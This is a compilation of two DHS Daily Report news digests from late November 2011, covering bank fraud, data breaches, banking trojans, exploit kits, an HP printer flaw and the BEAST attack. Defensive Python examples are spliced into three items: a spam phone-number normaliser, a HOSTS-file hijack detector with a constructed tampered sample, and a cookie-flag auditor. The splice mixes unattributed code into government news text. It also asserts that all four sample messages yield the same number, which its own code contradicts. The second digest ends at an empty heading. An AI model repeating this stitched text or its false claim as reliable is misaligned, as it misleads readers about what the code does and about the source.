Wednesday, November 30, 2011

Complete DHS Daily Report for November 30, 2011

Daily Report

Top Stories

• A cellphone service that is supposed to grant priority to emergency government and public safety calls failed during the August earthquake that rocked the East Coast, a DHS official said November 28. – NextGov (See item 32)

32. November 28, NextGov – (National) Cellphone emergency call service failed following East Coast quake. A cellphone service that is supposed to grant priority to emergency government and public safety calls failed during the August earthquake that rocked the East Coast, a DHS official said November 28. The Wireless Priority Service, a voice feature that does not require a special cellphone, was overwhelmed by text-messaging traffic in the aftermath of the 5.8 magnitude shaker August 23, said the acting director of the DHS National Communications System. It is widely acknowledged that many Americans were unable to make personal calls for several minutes following the earthquake. DHS officials are working with carriers to modify their circuitry by the time of the Republican and Democratic national conventions late summer of next year, he said. "That is a significant requirement that we must have," he said. He told Nextgov that Alcatel-Lucent's hardware should be fixed by Christmas. Source: http://www.nextgov.com/nextgov/ng_20111128_2122.php

• Researchers found an HP LaserJet printer vulnerability that could allow hackers to remotely control the device to launch cyberattacks, steal data, and even instruct its components to overload until it catches fire. – Softpedia (See item 36 below in the Information Technology Sector)

Details

Banking and Finance Sector

10. November 29, BankInfoSecurity – (California) Fraud scheme hits grocer. Modesto, California-based grocery chain Save Mart Supermarkets issued a consumer advisory November 23 about card-reader breaches at 20 of its stores. According to a statement posted on Save Mart's Web site, tampered card-readers at self-service checkout lanes in 19 Lucky Supermarkets locations and one Save Mart store were discovered during routine maintenance. The statement did not say when the tampering might have occurred or what method of tampering was used. It is not clear if skimmers were installed, or if the card readers were replaced with readers manipulated to collect details. Save Mart did say, however, that it replaced readers on all of the affected terminals and added additional security to point-of-sale card readers in all of its 234 locations soon after the tampering was discovered. "We are not aware nor have we been notified of any reports that customer accounts were compromised," the company statement said. "The appropriate authorities have been notified of this situation and consumer notices have been posted at credit/debit terminals in the affected stores as well as placed on our Web sites." Source: http://www.bankinfosecurity.com/articles.php?art_id=4280

11. November 28, CNN – (National) Citigroup's mortgage securities fraud settlement with SEC rejected. A judge rejected a proposed $285 million mortgage securities fraud settlement between Citigroup and the Securities and Exchange Commission (SEC) November 28, saying the deal was "neither fair, nor reasonable, nor adequate, nor in the public interest." A judge said that the settlement announced in October 2011, under which Citi neither admitted nor denied the SEC's allegations, deprived the public "of ever knowing the truth in a matter of obvious public importance." He instead ordered Citi to face trial over the allegations in July 2012. A spokeswoman for Citi said the bank was "declining to comment, pending a review of the decision." The SEC has alleged that in 2007, Citi created and sold a mortgage-related collateralized debt obligation, or CDO, called Class V Funding III. After marketing the CDO, Citi then took a short position — or bet against — the security as the housing market deteriorated, bringing in a net profit of $160 million for the bank. Investors, meanwhile, lost more than $700 million. Source: http://www.chicagotribune.com/business/breaking/chi-citigroups-mortgage-securities-fraud-settlement-with-sec-rejected-20111128,0,5534190.story

12. November 28, WDEF 12 Chattanooga – (Georgia) Debit card scam not linked to any local retailers. Hundreds of north Georgia residents found themselves in the middle of a scam the week of November 21. Officials believe the scam started November 23, when many Walker County residents found themselves with a depleted bank account. "We've seen charges made from people's card from Spain to Egypt to Europe to Mexico," a LaFayette Police Department sergeant said. Officials believe this is an elaborate crime ring that used the holiday to take advantage of people's accounts. "We have not tracked this source back to any particular business in our jurisdiction. I can tell you that with absolute certainty," the sergeant said. Officials said about 400 to 500 residents have reported the issue to local banks in the Walker County and LaFayette area. There have also been reports of the same scam in other counties. "There could be as many as 100 victims in the Chattooga County area," the Walker County sheriff said. Officials said the scam starts with the credit card processing company, not a local retailer. The FBI is assisting in the investigation. Source: http://www.wdef.com/news/story/Debit-Card-Scam-Not-Linked-To-Any-Local-Retailers/-hTdSz-59kC2wPBqNRpFYw.cspx

13. November 28, Grand Rapids Press – (Michigan) Grand Rapids-area broker described as 'mini-Madoff' in alleged Ponzi scheme. A Grand Rapids, Michigan stockbroker is facing federal allegations linked to a $6-million Ponzi-style scheme, the Grand Rapids Press reported November 28. The government has filed felony information accusing the broker of mail fraud for sending falsified account statements to clients. The U.S. Securities and Exchange Commission (SEC) earlier filed a civil injunction against the broker and his companies, Wealth Resources Inc. and Wealth Resources LLC, alleging he acted as an unregistered broker and investment adviser to raise funds from at least 20 investors. "Based upon representations made by [the broker] investors gave money to [the man] to place in Wealth Resources LLC and invest on their behalf," an assistant U.S. attorney wrote in court documents. "[He] induced his clients to withdraw money from their retirement accounts, investment accounts, bank accounts and from other sources on the premise that [he] would invest their money into legitimate investment opportunities. However, [he] lied about the success of Wealth Resources LLC, and other investment opportunities that he recommended, and diverted some of his clients’ money for his own use." The attorney said he "fabricated" account statements that led "clients to believe that their investment was safe and growing." The broker was a registered representative of New England Securities from December 1998 to April 2010. When the broker filed for bankruptcy in June 2010, clients filed a complaint to prevent discharge of his $4.3 million debt to them, court records showed. The government said he used some of the money to "make Ponzi-like payments to other customers who requested a return of all or part of their investment." Source: http://www.mlive.com/news/grand-rapids/index.ssf/2011/11/grand_rapids-area_broker_descr.html

14. November 28, Fort Worth Star-Telegram – (Texas) 2 UNT freshmen accused of printing fake money in dorm. Two University of North Texas freshmen were arrested November 7 on suspicion of forgery, and accused of running a counterfeiting operation from a dorm room until a store clerk reported receiving a fake $20 bill to Denton, Texas, police. Denton officers arrested the students after an officer found fake $1 and $20 bills atop a printer in one of their dormitories, police said. The students face a felony charge of forgery, which carries a sentence of 180 days to 2 years in state jail, and a fine of up to $10,000. The case came under police scrutiny when a convenience store clerk reported a questionable-looking $20 bill, a Denton police spokesman said. The investigation led to a search of a student's dorm room which turned up a scanner/printer, and a computer used to print money. "Apparently there was money on top of it that they were still in the process of making money," the Denton police spokesman said. He said the counterfeit bills were passed at area fast-food restaurants and convenience stores. Source: http://www.star-telegram.com/2011/11/28/3556376/2-unt-freshmen-accused-of-printing.html#storylink=omni_popular

15. November 23, Federal Bureau of Investigation – (National) FBI Denver Cyber Squad advises citizens to be aware of a new phishing campaign. The FBI Denver Cyber Squad advised citizens of a new spear phishing campaign involving personal and business bank accounts, financial institutions, money mules, and jewelry stores. The campaign involves a variant of the "Zeus" malware called "Gameover." The campaign features e-mails claiming to be from the National Automated Clearing House Association (NACHA), and advising the user of a problem with an ACH transaction at their bank that was not processed. Users that click on the link are infected with the Zeus or Gameover malware, which can key log as well as steal online banking credentials, defeating several forms of two-factor authentication. After accounts are compromised, the perpetrators conduct a Distributed Denial of Service (DDoS) attack on the financial institution. The belief is the DDoS is used to deflect attention from the wire transfers as well to prevent a reversal of the transactions (if found). A portion of the wire transfers is being transmitted directly to high-end jewelry stores, wherein the money mule comes to the actual store to pick up his $100,000 in jewels (or whatever dollar amount was wired). An investigation has shown the perpetrators contact the high-end jeweler requesting to purchase precious stones and high-end watches. The perpetrators advise they will wire the money to the jeweler’s account and someone will come pick up the merchandise. The next day, a money mule arrives at the store, the jeweler confirms the money has been transferred or is listed as "pending" and releases the merchandise to the mule. Later on, the transaction is reversed or cancelled (if the financial institution caught the fraud in time), and the jeweler is out whatever jewels the money mule was able to obtain. 
Source: http://www.fbi.gov/denver/press-releases/2011/fbi-denver-cyber-squad-advises-citizens-to-be-aware-of-a-new-phishing-campaign?utm_campaign=email-Immediate&utm_medium=email&utm_source=denver-press-releases&utm_content=51037

For another story, see item 38 below in the Information Technology Sector

Information Technology

35. November 29, The Register – (International) 13 million gamers in ID theft scare after Nexon breach. An estimated 13 million gamers have been left at greater risk of ID theft following a breach at gaming firm Nexon. Data including names, usernames, encrypted resident registration numbers, and password hashes was exposed as a result of the breach at Nexon, which maintains the popular online role-playing game Maple Story. The data breach followed a hack on a backup server for Maple Story late the week of November 21. Details of the 5 million customers of other games maintained by Nexon were not exposed. Nexon promised to bolster its security in the wake of the attack, the Korea Herald reports. In addition, it is offering game items to gamers who change their passwords. Source: http://www.theregister.co.uk/2011/11/29/nexon_data_breach/

36. November 29, Softpedia – (International) HP printers may be remotely set on fire, researchers say. Researchers at Columbia University in New York City found an HP LaserJet printer vulnerability that could allow a hacker to remotely control the device to launch cyberattacks, steal data that is being printed, and even instruct its mechanical components to overload until it catches fire. According to MSNBC, the researchers revealed the flaw they found does not affect only HP printers, but also other devices utilized by millions of individuals and companies that so far were considered to be safe. In the case of the HP printers which they thoroughly tested, the researchers relied on the fact that remote software updates are not checked for signatures or certificates when they are being installed. In another demonstration, by sending a specially crafted print job, they were able to inject code that would automatically scan printed documents for sensitive information, transmitting the data to a Twitter feed. They showed an infected computer could instruct the printer's fuser, the component used to dry the paper, to continuously heat up until the device self-destructs or, if it lacks a fuse, sets itself on fire. They also proved a hijacked printer could act as a gate-opener for a full-effect attack on a company network. They even made a demo from computers running Mac and Linux operating systems. HP representatives argue the situation might not be all that disastrous, claiming their newer models check for signatures while performing firmware updates. However, they are currently investigating the issue to determine exactly what is affected and what can be done about it. Even though later printer models should be more secure, the researchers claim one of the printers used in their tests was purchased not long ago. Source: http://news.softpedia.com/news/HP-Printers-May-Be-Remotely-Set-On-Fire-Researchers-Say-237254.shtml

37. November 29, Softpedia – (International) Russian spammers rely on new techniques to mask phone numbers. Some spam messages contain phone numbers instead of links that point to locations where different products are advertised. To make sure they successfully avoid spam filters, Russian spammers devised new ways to keep phone numbers hidden. Symantec researchers reveal the large number of methods utilized by Russian spammers to list phone numbers in e-mail messages without raising the suspicion of any anti-spam solution. One of the simpler methods involves placing symbols between the digits of the number. In some cases, Russian characters that resemble digits are used to replace some of them. Also, in some scenarios, the numbers were spelled out as Russian words. One final strategy involves writing the area code as the name of the city it represents. Source: http://news.softpedia.com/news/Russian-Spammers-Rely-on-New-Techniques-to-Mask-Phone-Numbers-237269.shtml
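The four masking methods described above can be undone before a spam filter looks for phone numbers. The normalizer below is an added example, not code from Symantec or the article; the homoglyph table, the Russian number words and the two city-to-area-code entries are constructed sample mappings, and the sample messages are constructed.

```python
import re

# Cyrillic letters that look like Latin digits (constructed sample table).
HOMOGLYPH_DIGITS = {"О": "0", "о": "0", "З": "3", "з": "3", "Ч": "4", "б": "6"}

# Russian number words 0-9 (assumed complete enough for digit-by-digit spelling).
NUMBER_WORDS = {
    "ноль": "0", "нуль": "0", "один": "1", "два": "2", "три": "3", "четыре": "4",
    "пять": "5", "шесть": "6", "семь": "7", "восемь": "8", "девять": "9",
}

# City name -> area code (constructed sample; a real filter would carry a full table).
CITY_CODES = {"Москва": "495", "Санкт-Петербург": "812"}

# A phone-like run: 10 or 11 digits with up to three non-word "junk" chars between each.
PHONE_RE = re.compile(r"(?:\d\W{0,3}){10,11}")


def _fix_token(m):
    """Map look-alike letters to digits, but only inside tokens that already hold a digit."""
    tok = m.group(0)
    if not any(c in "0123456789" for c in tok):
        return tok
    return "".join(HOMOGLYPH_DIGITS.get(ch, ch) for ch in tok)


def normalize(text):
    """Collapse the masking tricks into plain digits; separators are left for PHONE_RE."""
    t = text
    # Longest word first so that "восемь" is not mangled by its suffix "семь".
    for word, digit in sorted(NUMBER_WORDS.items(), key=lambda kv: -len(kv[0])):
        t = re.sub(re.escape(word), digit, t, flags=re.IGNORECASE)
    for city, code in CITY_CODES.items():
        t = re.sub(re.escape(city), code, t, flags=re.IGNORECASE)
    # Homoglyph substitution per whitespace-delimited token.
    return re.sub(r"\S+", _fix_token, t)


def extract_phones(text):
    """Return canonical 11-digit strings (country code 7) for phone-like runs."""
    found = []
    for m in PHONE_RE.finditer(normalize(text)):
        digits = re.sub(r"\D", "", m.group(0))
        if len(digits) == 10:
            digits = "7" + digits            # bare area code + subscriber number
        elif digits[0] == "8":
            digits = "7" + digits[1:]        # Russian trunk prefix 8 -> country code 7
        found.append(digits)
    return found


if __name__ == "__main__":
    # Constructed sample messages, one per masking technique.
    for msg in ("Звоните: 8 (9*2*6) 1-2-3-4-5-6-7",
                "тел. 8-926-12З-45-67",
                "восемь девять два шесть один два три четыре пять шесть семь",
                "Москва 123-45-67"):
        print(msg, "->", extract_phones(msg))
```

All four constructed messages normalize to the same canonical number, which is what lets a filter treat them as one campaign.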

38. November 29, The Register – (International) Danger worm hijacks Facebook accounts to inject banking trojan. A dangerous worm is using Facebook to spread itself by posting malicious links on the social networking Web site that point to malware-tainted sites loaded with a variant of the Zeus banking trojan as well as other pieces of malware. The malware uses stolen Facebook account credentials to log into compromised accounts and post links, according to security researchers at CSIS in Denmark, who were the first to detect the threat. The malicious links generated by the worm pose as links to a photo file posted by the account-holder's friend or online acquaintance. In reality, the file is a booby-trapped screensaver file with a .jpg file extension. Users have to download and open the file, but if tricked into doing so, the consequences can be serious, especially since anti-virus detection rates are quite low. CSIS added the worm is also using other domains to spread. Source: http://www.theregister.co.uk/2011/11/29/facebook_worm_spreads/

39. November 29, Help Net Security – (International) FakeScanti rogue sends users to download additional fake AV solution. The Blackhole exploit kit has been getting a lot of attention recently, because it is continually updated with exploits for various flaws in popular software, and can deliver practically any malware the attackers want it to. Among that malware are rogue AV solutions such as those belonging to the FakeScanti malware family. One of the variants — named "AV Protection 2011" — can modify the infected computer's HOSTS file (the file that allows the system to map hostnames to IP addresses) so that when the user tries to visit the Google Search engine, Facebook, or Bing, he/she is redirected to a page hosted in Germany that serves up another variant of the same family. The hijacking of the HOSTS file is not unusual behavior when it comes to worms and backdoors, but it is not often seen in rogue AV solutions, said a GFI researcher. The technique is also often used by phishers for seamlessly redirecting users to phishing pages when they try to visit legitimate ones. Source: http://www.net-security.org/malware_news.php?id=1920
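A HOSTS file rewritten this way is easy to audit: any well-known domain mapped to a routable address is a redirect, while a mapping to a loopback or unspecified address only blocks the name. The checker below is an added example, not code from GFI or the article; the watched-domain set and the sample file contents are constructed, and on Windows the file lives at %SystemRoot%\System32\drivers\etc\hosts.

```python
import ipaddress

# Constructed sample of a tampered HOSTS file: the first entries are normal,
# the rest pin well-known domains to one address, the behaviour described
# for "AV Protection 2011". 203.0.113.0/24 is a documentation range.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
# --- constructed suspicious entries ---
203.0.113.45    www.google.com
203.0.113.45    google.com
203.0.113.45    www.facebook.com
203.0.113.45    www.bing.com
0.0.0.0         ads.example.net
"""

# Domains that legitimate software rarely has a reason to override locally (assumed list).
WATCHED_DOMAINS = {"google.com", "facebook.com", "bing.com"}


def parse_hosts(text):
    """Yield (ip, hostname) pairs from HOSTS-format text, ignoring comments and blanks."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        for name in parts[1:]:
            yield parts[0], name.lower().rstrip(".")


def _registrable(hostname):
    """Crude parent-domain reduction: 'www.google.com' -> 'google.com'."""
    labels = hostname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else hostname


def _is_blackhole(ip):
    """Loopback or unspecified addresses only block a name; they cannot redirect it."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_unspecified


def find_redirects(text, watched=WATCHED_DOMAINS):
    """Return (redirects, blocks): watched names sent to a routable address vs. merely blocked."""
    redirects, blocks = [], []
    for ip, name in parse_hosts(text):
        if _registrable(name) not in watched:
            continue
        (blocks if _is_blackhole(ip) else redirects).append((name, ip))
    return redirects, blocks


def redirect_targets(text, watched=WATCHED_DOMAINS):
    """Group redirected names by destination; one IP fronting several unrelated
    brands is the strongest single indicator of a hijacked HOSTS file."""
    by_ip = {}
    for name, ip in find_redirects(text, watched)[0]:
        by_ip.setdefault(ip, []).append(name)
    return by_ip


if __name__ == "__main__":
    redirects, blocks = find_redirects(SAMPLE_HOSTS)
    for name, ip in redirects:
        print(f"REDIRECT {name} -> {ip}")
    for name, ip in blocks:
        print(f"BLOCK    {name} -> {ip}")
    print(redirect_targets(SAMPLE_HOSTS))
```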

40. November 28, H Security – (International) Google+ security attracts praise and criticism. Security researchers at University College London subjected Google+ to a first IT security analysis, the main focus of which was on privacy. The currently preliminary results are ambivalent: the researchers commended new functions which improve networking security among friends, but they have also highlighted several potentially problematic details. Among these concerns is the way in which Google+ currently handles images. The researchers showed that photos uploaded to the network retain their metadata. However, they say the service does not inform users about this. Another problem area is the Google+ "About" section. There, Google is apparently prompting users to list previous addresses, previous names, and their maiden name. The researchers said this information could be particularly useful to identity thieves. The researchers commended the fact that Google+ uses SSL encryption by default, for the entire Google+ network connection. Facebook only uses this encryption for its login page, unless a user explicitly enables the security feature. The researchers concluded that, therefore, Google+ sessions offer better protection against "man-in-the-middle" attacks. Source: http://www.h-online.com/security/news/item/Google-security-attracts-praise-and-criticism-1386437.html

For another story, see item 15 above in the Banking and Finance Sector

Communications Sector

41. November 28, Internet Retailer – (National) The Thanksgiving weekend brings site headaches for multiple online retailers. PC Mall Inc. and Crutchfield Corp. were among the retailers experiencing significant downtime on their e-commerce sites November 28, according to Web site performance-monitoring firm Catchpoint Systems Inc. The e-commerce site operated by PC Mall had suffered 77 minutes of downtime as of noon Eastern time, Catchpoint said. The Crutchfield site had 60 minutes of downtime. Other e-commerce sites also experienced problems over the holiday weekend, according to a report from Web site performance-monitoring firm AlertBot. The site operated by American Eagle Outfitters Inc. was down for a little over 8 hours between about 9 p.m. Eastern time November 23 and November 28, an AlertBot sales and marketing manager said. "An error message appeared numerous times over the Thanksgiving break," he said. The e-commerce site operated by Target Corp. experienced loading problems for more than 2 hours November 25, the day after Thanksgiving — the latest difficulty for the redesigned site since its introduction in August. The problems occurred between 3:30 p.m. and 4:10 p.m. and 5:10 p.m. and 6:45 p.m. Eastern time November 25, AlertBot said. Source: http://www.internetretailer.com/2011/11/28/thanksgiving-weekend-brings-multiple-site-headaches

For more stories, see item 32 above in Top Stories and items 38 and 40 above in the Information Technology Sector

Tuesday, November 29, 2011

Complete DHS Daily Report for November 29, 2011

Daily Report

Top Stories

• Police broke up a fight in a Washington, D.C. restaurant November 27, only to have the melee erupt into gunfire and knife-play that left one dead and five wounded. – United Press International (See item 18)

18. November 27, United Press International – (District of Columbia) 1 dead, 5 wounded in melee shooting. Police broke up a fight in a Washington, D.C. restaurant November 27, only to have the melee erupt into gunfire and knife-play that left one dead and five wounded. The victim who died was identified as a 34-year-old, the Washington Post reported. One of the wounded, who was at the Heritage India restaurant in Dupont Circle celebrating a friend’s birthday when the violence broke out about 2:45 a.m., told the newspaper he and a lifelong friend crossed the street with another person to escape the violence. One other person was shot, and three people were stabbed. All of the victims live in Maryland, police said. No arrests were made and investigators were trying to determine what led to the initial fight, the Post said. Source: http://www.upi.com/Top_News/US/2011/11/27/1-dead-5-wounded-in-melee-shooting/UPI-32201322454882/?spt=hs&or=tn

• Federal officials entered discussions with W.R. Grace & Co. over how to clean up asbestos washing into the Kootenai River from a vermiculite mine that the company owns in Libby, Montana. The mine has created dust that killed about 400 people and sickened thousands. – Associated Press (See item 21)

21. November 26, Associated Press – (Montana) As asbestos washes into Montana river, EPA and W.R. Grace negotiate Libby mine site cleanup. Federal officials have entered discussions with W.R. Grace & Co. over how to clean up asbestos washing into the Kootenai River from a deadly vermiculite mine the company owns in Libby, Montana. More than 20 years after the Maryland-based Grace closed the above-ground mine, test results provided by regulators show high amounts of asbestos pouring from creeks inside the mine site during the annual spring snowmelt. The creeks drain into the Kootenai upstream of Libby, where an estimated 400 people have been killed and 1,750 sickened by asbestos dust released when vermiculite ore was mined to make residential insulation. The consequences of inhaling Libby's potent asbestos fibers are well documented, but much less is known about the dangers of ingesting the fibers and their potential harm to wildlife. U.S. Environmental Protection Agency (EPA) regulators said they are trying to gauge the risk from the water-borne asbestos and have yet to determine how far downriver the contamination might extend. Some Libby residents worried the contaminated water could prolong a cleanup that has cost more than $370 million over the past decade. At the mine site, one water sample taken from Rainy Creek in May showed 276 million asbestos fibers per liter of water. Several miles downstream, water pumped from the Kootenai is used in the cleanup to suppress dust and for equipment decontamination. EPA officials said 10 samples taken in recent months did not detect asbestos in the pumped water. 
The Kootenai River is not the drinking water source for Libby, nor are any of the creeks that come from the mine; however, the test results from Rainy Creek are "huge" and could pose risks to populations that live anywhere along the Kootenai between Rainy Creek and the Pacific Ocean, said a member of the Libby Area Technical Advisory Group, an EPA-funded cleanup oversight panel. State officials said berms along the creeks, more vegetation, and other measures could be used to stop asbestos-tainted sediment from entering the water. Source: http://www.therepublic.com/view/story/9a322b2b8ebb442ca4dea5fceb4e5379/MT--Libby-Mine/

Details

Banking and Finance Sector

9. November 28, Sofia News Agency – (International) Bulgaria: Sofia airport customs officers seize flash drives containing credit card data. Customs officers at Sofia Airport in Bulgaria have seized USB memory sticks containing credit card data, Bulgaria’s Customs Agency reported November 28. The portable devices were found to belong to two Bulgarian citizens arriving from a Madrid flight. The passengers were coming from Lima, Peru, and were selected under a risk analysis method in the sphere of cocaine trafficking. In the course of the inspection and the subsequent questionings, the two passengers were nervous and offered contradicting and mixed-up explanations about their trip, which caused the customs officers to dig deeper. Although the data stored on the flash drives was encrypted, the customs authorities were able to identify data from numerous credit cards of American and European tourists residing in Peru, as well as instructions regarding the ownership of the cards and the methods for withdrawing the money. The customs officers also seized the two men’s laptops. Source: http://www.novinite.com/view_news.php?id=134328

10. November 22, KOMO 4 Seattle – (Washington) Bellevue stockbroker pleads guilty in $7 million fraud scheme. A Bellevue, Washington stockbroker pleaded guilty November 21 to wire fraud in federal court, admitting he defrauded at least 10 clients of as much as $7 million. According to U.S. district court records, he sent phony statements to his clients that hid significant losses and commissions. He also charged huge commissions, transferring hundreds of thousands of dollars to his personal checking account to pay for his own credit card bills, food, and entertainment, as well as business expenses such as payroll, fees, and taxes, court records show. The man now faces more than 6 years in federal prison under the plea deal with prosecutors. The amount of restitution will be determined at his sentencing February 17. A spokesperson for the U.S. attorney’s office said the man owned and operated Black Diamond Capital Management, LLC, and Black Diamond Securities, LLC. In the plea agreement, the man admitted some of the victims invested with him when he was working for a Seattle brokerage firm. Source: http://www.komonews.com/news/local/Bellevue-stockbroker-pleads-guilty-to-7-million-fraud-scheme-134351898.html

11. November 22, Nanuet Patch – (New York) Five charged with involvement in countywide ATM skimming operation. Police warned holiday shoppers to be careful while using Westchester, New York ATMs after uncovering an elaborate ATM skimming scheme they said netted a group of thieves about $1 million over the last few months, the Nanuet Patch reported November 22. A joint task force involving the Westchester County Police, U.S. Secret Service, and nine local police departments worked together to make five arrests. The scheme involved the placement of “dip readers,” which read ATM cards when they are placed in a machine, paired with a small pin-hole camera used to obtain card-holders’ PIN numbers, police said. The obtained personal information was then copied onto blank cards and used to make withdrawals at another bank. Police believe those arrested are low-level criminals working for a larger organized crime group. ATM skimmers have been found in ATMs throughout the New York Metro area. The Bronxville police chief said 330 accounts were compromised at a Chase branch on Parkway Road in Bronxville in October. “On two consecutive Sundays we lost $330,000 as a result of the skimmers,” he said. Police said none of those arrested are from Westchester County, and that some are not U.S. citizens. All of the suspects are of Eastern European descent. All have been charged with possession of forgery devices, a felony. Source: http://nanuet.patch.com/articles/5-arrested-in-county-wide-atm-skimming-operation#video-8519476

12. November 22, Bloomberg – (National) Bank of America settles Countrywide fraud claims by Calpers. Bank of America Corp. settled securities fraud claims by a group of Countrywide Financial investors including the California Public Employees' Retirement System (Calpers) that opted out of a $624 million class-action settlement in 2010, Bloomberg reported November 22. A confidential settlement has been reached with all defendants except KPMG LLP, Countrywide's former auditor, lawyers for the plaintiffs said in a filing November 21 in federal court in Los Angeles. Countrywide, acquired by Bank of America in 2008, was accused of misleading shareholders about its finances and lending practices. The plaintiffs, which also include funds managed by BlackRock Inc., T. Rowe Price Group Inc., and TIAA-CREF, are the largest group of those who rejected the 2010 settlement, saying the terms were inadequate. The settlement leaves two other lawsuits by investors that opted out of the 2010 settlement still pending in Los Angeles federal court, one by a group of Michigan public pension funds, and one by the Fresno County Employees Retirement Association. A group of Oregon funds that opted out filed a lawsuit in January in Oregon state court. Calpers, the largest U.S. public pension fund with $227.5 billion in assets, and the other investors did not specify their alleged damages in the complaint filed July 28. Source: http://news.businessweek.com/article.asp?documentKey=1376-LV2UVS6JTSEC01-7TUFFRCEG9OTQCC2147KJ873QM

Information Technology

28. November 28, CNN – (International) 150 domain names shut down in probe of counterfeit goods. U.S. officials used Cyber Monday (November 28) to announce court orders shutting down 150 domain names of commercial Web sites they say were selling “many millions” of dollars worth of counterfeit goods. Sports jerseys and uniforms, DVDs, shoes and handbags, golf sets, and exercise equipment were among the more popular purchases of “knock off” versions of name brand products, officials said. Investigations show the majority of those engaged in defrauding rights-holding companies and consumers are from China, but the phony goods are also produced in other countries, according to top law enforcement officials. The officials said they conduct undercover purchases with the help of legitimate rights holders to confirm the goods are bogus. They acknowledge the operators of the Web sites are beyond the reach of U.S. agents, and when the sites selling counterfeit goods are shut down, the same criminal enterprises sometimes change domain names and continue to prey on customers. The Immigration and Customs Enforcement agency, the FBI, and U.S. attorney offices cooperated in the investigation, dubbed Operation In Our Sites. The operation they announced November 28 is designed in part to educate consumers to be wary of Web sites that appear to be offering name-brand products at substantially reduced prices. Authorities said they are unable to provide estimates of losses, but are concerned some of the millions of dollars in proceeds may end up in the hands of organized crime rings. Source: http://www.cnn.com/2011/11/28/tech/websites-counterfiet-goods/index.html?hpt=hp_t3

29. November 28, Softpedia – (International) BlackHole kit enhanced with new Java exploit. A security researcher discovered a new exploit kit that relies on a recently patched security flaw present in Java, being packaged with BlackHole. It appears all the versions of Oracle’s Java are susceptible to the attack, except for the latest variants, but considering many do not rush to update these components, the exploit could be used successfully against many devices. Also, these means of attack can be easily turned into automated tools, which once placed on a Web site, can infect the machines of unsuspecting Internet users without much effort. The Java exploit works on most browsers, except for Google Chrome, which for some reason often mitigates attacks launched with the new package. The security journalist also believes that, theoretically, such an attack can also work against Mac OS X operating systems, but so far it has only been tested on Windows platforms. The hacker that advertised the newest Java exploit is giving it away for free to customers that already purchased the BlackHole kit, but for newcomers, the price is around $4,000, plus the cost of the Blackhole license. Source: http://news.softpedia.com/news/BlackHole-Kit-Enhanced-With-New-Java-Exploit-236928.shtml

30. November 27, TheDomains.com – (International) 101Domain.com suffers security breach. 101Domain.com appeared to suffer a security breach that “may have resulted in unauthorized access to your personal information and possibly payment information.” According to Webhosting.info, 101domain.com has about 10,000 domain names under management. A message by 101Domain.com to its customers explains: “We need to make you aware of a security breach that may potentially have affected your account. We were recently informed by one of our vendors that some of its systems, and those of a few of its customers, including 101domain.com, were compromised to varying degrees by a phishing attack. Although there is no direct evidence that your information was stolen and we have received no customer complaints, this attack may have resulted in unauthorized access to your personal information and possibly your payment information.” Source: http://www.thedomains.com/2011/11/27/101domains-com-suffers-securty-breach/

31. November 25, Infosecurity – (International) BEAST-driven SSL attack not as bad as it seems claims Context. Researchers at Context Information Security are playing down the level of risk to enterprises from BEAST (Browser Exploit Against SSL/TLS), the attack identified by researchers in late September. As previously reported, those researchers said they had found a way to break the SSL/TLS encryption that is widely used to protect the integrity and confidentiality of data exchanged between Web browsers and servers. After analyzing the researchers’ findings, Context said attackers are very unlikely to use the complex attack methodology. The company also provided advice on how to further reduce the risk. According to Context’s research and development manager, developers can raise the attack’s complexity and mitigate the risk of malicious content being injected within the same origin by setting the HttpOnly attribute on cookies, which prevents applets and JavaScript from reading the cookie and so prevents session hijacking. Against this backdrop, Context’s research team argues that, in terms of risk, the BEAST attack is comparable to not setting HttpOnly on cookies, something that is not unusual among Web sites. Source: http://www.infosecurity-magazine.com/view/22287/beastdriven-ssl-attack-not-as-bad-as-it-seems-claims-context/
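The cookie advice above is easy to verify in practice. The script below is an added example (not code from Context or Infosecurity): it parses raw Set-Cookie headers, reports cookies that lack HttpOnly or Secure, and emits a correctly flagged session cookie for comparison. The sample response headers are constructed, not captured from any real site.

```python
"""Audit Set-Cookie headers for the HttpOnly and Secure attributes.

Added example; not code from Context Information Security or the article.
"""


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, {attribute: value}).

    Attribute names are lower-cased; flag attributes such as HttpOnly and
    Secure, which carry no value, are stored as True.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header):
    """Return the list of findings for one Set-Cookie value (empty means OK)."""
    _name, _value, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")
    if "secure" not in attrs:
        findings.append("missing Secure")
    return findings


def build_session_cookie(name, value, path="/"):
    """Emit a Set-Cookie value with both flags set, for a session cookie."""
    return f"{name}={value}; Path={path}; HttpOnly; Secure"


def audit_response_headers(raw_headers):
    """Audit every Set-Cookie line in a raw HTTP header block.

    Returns {cookie_name: [findings]} for cookies with at least one finding.
    """
    report = {}
    for line in raw_headers.splitlines():
        key, sep, val = line.partition(":")
        if sep and key.strip().lower() == "set-cookie":
            name, _, _ = parse_set_cookie(val.strip())
            findings = audit_set_cookie(val.strip())
            if findings:
                report[name] = findings
    return report


# Constructed sample response headers (not captured from any real site).
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: JSESSIONID=9F3A; Path=/
Set-Cookie: prefs=dark; Path=/; Secure
Set-Cookie: csrf=2b1c; Path=/; HttpOnly; Secure
"""

if __name__ == "__main__":
    for cookie, findings in audit_response_headers(SAMPLE_HEADERS).items():
        print(f"{cookie}: {', '.join(findings)}")
    print(build_session_cookie("session", "abc123"))
```

One caveat the item does not spell out: HttpOnly keeps the cookie out of reach of scripts, but the browser still attaches it to every request those scripts trigger, and BEAST works on the TLS record layer rather than on script access to the cookie. Treat the flag as general session hardening; the BEAST mitigations proper live in the TLS stack (TLS 1.1 or later, or the 1/n-1 record splitting that browsers shipped at the time).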

For more stories, see items 9 above in the Banking and Finance Sector and 32 below in the Communications Sector

Communications Sector

